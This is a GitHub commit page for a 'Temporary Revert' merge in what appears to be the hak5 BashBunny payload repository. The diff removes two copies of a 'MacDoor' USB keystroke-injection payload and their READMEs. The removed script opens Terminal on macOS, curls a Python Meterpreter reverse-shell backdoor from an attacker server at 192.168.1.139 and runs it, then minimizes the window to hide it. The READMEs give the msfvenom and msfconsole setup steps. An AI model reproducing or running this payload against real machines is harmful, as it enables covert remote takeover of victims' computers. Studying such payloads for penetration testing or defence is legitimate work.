Merge pull request #666 from hak5/revert-662-master

Temporary Revert
pull/669/merge
Dallas Winger 2023-09-18 12:54:45 -04:00 committed by GitHub
commit 98bfe07603
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
4 changed files with 0 additions and 154 deletions

View File

@ -1,47 +0,0 @@
#!/bin/bash
#
# Title: MacDoor
# Description: Download a Python backdoor from our server, run it in terminal and minimize the terminal window.
# Author: afsh4ck
# Version: 1.0
# Target: MacOS
# Category: Execution
#
# Steps:
# Step 1: msfvenom -p python/meterpreter/reverse_tcp LHOST={your IP} LPORT=4444 -o backdoor.py
# Step 2: mount a local server 'python3 -m http.server'
# Step 3: msfconsole multi/handler listener open before the attack.
#
# Note:
# You need to modify the script with your attacker IP and the port or your local server.
#
# Purple.............Setup
# Yellow blink.......Attack Mode ON
# Green..............Finish
LED SETUP
ATTACKMODE HID STORAGE ECM_ETHERNET
LED ATTACK
# Open terminal
QUACK GUI SPACE
QUACK DELAY 500
QUACK STRING Terminal
QUACK ENTER
QUACK DELAY 3000
# Execute attack
QUACK STRING curl http://192.168.1.139:8000/backdoor.py -o Downloads/backdoor.py
QUACK ENTER
QUACK DELAY 1000
QUACK STRING cd Downloads
QUACK ENTER
QUACK STRING python3 backdoor.py
QUACK ENTER
# Minimize terminal
QUACK GUI m
QUACK DELAY 2000
# Standby
LED FINISH

View File

@ -1,30 +0,0 @@
# MacDoor - Python Backdoor Execution for the BashBunny
```
__ ___ ____
/ |/ /____ _ _____ / __ \ ____ ____ _____
/ /|_/ // __ `// ___// / / // __ \ / __ \ / ___/
/ / / // /_/ // /__ / /_/ // /_/ // /_/ // /
/_/ /_/ \__,_/ \___//_____/ \____/ \____//_/
```
* Author: afsh4ck
* Version: 1.0
* Target: MacOS
* Tested on: Ventura 13.3.1
* Category: Execution
# DESCRIPTION
Download a Python backdoor from our server, run it in terminal and minimize the terminal window.
# STEPS
* Step 1: msfvenom -p python/meterpreter/reverse_tcp LHOST={your IP} LPORT=4444 -o backdoor.py
* Step 2: mount a local server 'python3 -m http.server'
* Step 3: msfconsole multi/handler listener open before the attack.
# NOTE
* You need to modify the script with your attacker IP and the port or your local server.

View File

@ -1,47 +0,0 @@
#!/bin/bash
#
# Title: MacDoor
# Description: Download a Python backdoor from our server, run it in terminal and minimize the terminal window.
# Author: afsh4ck
# Version: 1.0
# Target: MacOS
# Category: Remote Access
#
# Steps:
# Step 1: msfvenom -p python/meterpreter/reverse_tcp LHOST={your IP} LPORT=4444 -o backdoor.py
# Step 2: mount a local server 'python3 -m http.server'
# Step 3: msfconsole multi/handler listener open before the attack.
#
# Note:
# You need to modify the script with your attacker IP and the port or your local server.
#
# Purple.............Setup
# Yellow blink.......Attack Mode ON
# Green..............Finish
LED SETUP
ATTACKMODE HID STORAGE ECM_ETHERNET
LED ATTACK
# Open terminal
QUACK GUI SPACE
QUACK DELAY 500
QUACK STRING Terminal
QUACK ENTER
QUACK DELAY 3000
# Execute attack
QUACK STRING curl http://192.168.1.139:8000/backdoor.py -o Downloads/backdoor.py
QUACK ENTER
QUACK DELAY 1000
QUACK STRING cd Downloads
QUACK ENTER
QUACK STRING python3 backdoor.py
QUACK ENTER
# Minimize terminal
QUACK GUI m
QUACK DELAY 2000
# Standby
LED FINISH

View File

@ -1,30 +0,0 @@
# MacDoor - Python Backdoor Execution for MacOS
```
__ ___ ____
/ |/ /____ _ _____ / __ \ ____ ____ _____
/ /|_/ // __ `// ___// / / // __ \ / __ \ / ___/
/ / / // /_/ // /__ / /_/ // /_/ // /_/ // /
/_/ /_/ \__,_/ \___//_____/ \____/ \____//_/
```
* Author: afsh4ck
* Version: 1.0
* Target: MacOS
* Tested on: Ventura 13.3.1
* Category: Remote Access
# DESCRIPTION
Download a Python backdoor from our server, run it in terminal and minimize the terminal window.
# STEPS
* Step 1: msfvenom -p python/meterpreter/reverse_tcp LHOST={your IP} LPORT=4444 -o backdoor.py
* Step 2: mount a local server 'python3 -m http.server'
* Step 3: msfconsole multi/handler listener open before the attack.
# NOTE
* You need to modify the script with your attacker IP and the port or your local server.